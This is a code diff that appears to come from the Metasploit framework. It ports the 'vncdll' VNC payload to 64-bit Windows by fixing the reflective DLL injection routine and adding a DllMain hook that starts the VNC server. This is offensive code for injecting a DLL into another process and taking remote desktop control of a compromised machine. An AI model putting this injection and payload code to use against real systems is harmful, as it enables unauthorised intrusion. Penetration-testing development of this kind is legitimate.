Fix vncdll on 64-bit systems.

external/source/vncdll/vncdll/inject.c

@@ -482,7 +482,11 @@ DWORD inject_dll( DWORD dwPid, LPVOID lpDllBuffer, DWORD dwDllLenght )
 			BREAK_WITH_ERROR( "[INJECT] inject_dll.  No Dll buffer supplied.", ERROR_INVALID_PARAMETER );
 
 		// check if the library has a ReflectiveLoader...
-		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpDllBuffer );
+#ifdef _WIN64
+		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpDllBuffer, "?ReflectiveLoader@@YA_KPEAX@Z");
+#else
+		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpDllBuffer, "?ReflectiveLoader@@YGKPAX@Z");
+#endif
 		if( !dwReflectiveLoaderOffset )
 			BREAK_WITH_ERROR( "[INJECT] inject_dll. GetReflectiveLoaderOffset failed.", ERROR_INVALID_FUNCTION );
 
@@ -515,7 +519,7 @@ DWORD inject_dll( DWORD dwPid, LPVOID lpDllBuffer, DWORD dwDllLenght )
 			BREAK_ON_ERROR( "[INJECT] inject_dll. WriteProcessMemory 2 failed" ); 
 
 		// add the offset to ReflectiveLoader() to the remote library address...
-		lpReflectiveLoader = (LPVOID)( (DWORD)lpRemoteLibraryBuffer + (DWORD)dwReflectiveLoaderOffset );
+		lpReflectiveLoader = (LPVOID)( (UINT_PTR)lpRemoteLibraryBuffer + (DWORD)dwReflectiveLoaderOffset );
 
 		// First we try to inject by directly creating a remote thread in the target process
 		if( inject_via_remotethread( hProcess, dwMeterpreterArch, lpReflectiveLoader, lpRemoteCommandLine ) != ERROR_SUCCESS )

external/source/vncdll/vncdll/loader.c

@@ -9,6 +9,7 @@
 #define VNCFLAG_DISABLECOURTESYSHELL		1
 #define VNCFLAG_DISABLESESSIONTRACKING		2
 
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
 #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
 /*
@@ -427,3 +428,26 @@ DWORD Init( SOCKET s )
 
 	return dwResult;
 }
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+			*(HMODULE*)lpReserved = hAppInstance;
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	case DLL_METASPLOIT_ATTACH:
+		Init((SOCKET)lpReserved);
+	}
+	return bReturnValue;
+}

external/source/vncdll/winvnc/WinVNC.vcxproj

@@ -270,7 +270,6 @@ exit 0</Command>
       <Culture>0x0809</Culture>
     </ResourceCompile>
     <Link>
-      <AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
       <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
       <SuppressStartupBanner>true</SuppressStartupBanner>
       <AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>

external/source/vncdll/winvnc/vncDesktop.cpp

@@ -1187,7 +1187,7 @@ BOOL vncDesktop::InitWindow()
 	}
 
 	// Set the "this" pointer for the window
-	SetWindowLong(m_hwnd, -21, (long)this); // #define GWL_USERDATA        (-21)
+	SetWindowLongPtrA(m_hwnd, -21, (ULONG_PTR)this); // #define GWL_USERDATA        (-21)
 
 	// Enable clipboard hooking
 	m_hnextviewer = SetClipboardViewer(m_hwnd);
@@ -1743,7 +1743,7 @@ vncDesktop::CalcCopyRects()
 LRESULT CALLBACK
 DesktopWndProc(HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
 {
-	vncDesktop *_this = (vncDesktop*)GetWindowLong(hwnd, -21);// #define GWL_USERDATA        (-2
+	vncDesktop *_this = (vncDesktop*)GetWindowLongPtrA(hwnd, -21);// #define GWL_USERDATA        (-2
 
 	switch (iMsg)
 	{

external/source/vncdll/winvnc/vncdll.cpp

@@ -254,12 +254,12 @@ DWORD vncdll_run( AGENT_CTX * lpAgentContext )
 
 /*
  * Grab a DWORD value out of the command line.
- * e.g. vncdll_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
+ * e.g. vncdll_command_ulong( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
  */
-DWORD vncdll_command_dword( char * cpCommandLine, char * cpCommand )
+ULONG_PTR vncdll_command_ulong( char * cpCommandLine, char * cpCommand )
 {
 	char * cpString = NULL;
-	DWORD dwResult  = 0;
+	ULONG_PTR ulResult  = 0;
 
 	do
 	{
@@ -272,11 +272,11 @@ DWORD vncdll_command_dword( char * cpCommandLine, char * cpCommand )
 
 		cpString += strlen( cpCommand );
 
-		dwResult = strtoul( cpString, NULL, 0 );
+		ulResult = strtoull( cpString, NULL, 0 );
 
 	} while( 0 );
 
-	return dwResult;
+	return ulResult;
 }
 
 /*
@@ -304,7 +304,7 @@ VOID vncdll_main( char * cpCommandLine )
 			{
 				AGENT_CTX * lpAgentContext = NULL;
 
-				lpAgentContext = (AGENT_CTX *)vncdll_command_dword( cpCommandLine, "/c:" );
+				lpAgentContext = (AGENT_CTX *)vncdll_command_ulong( cpCommandLine, "/c:" );
 
 				dwResult = vncdll_run( lpAgentContext );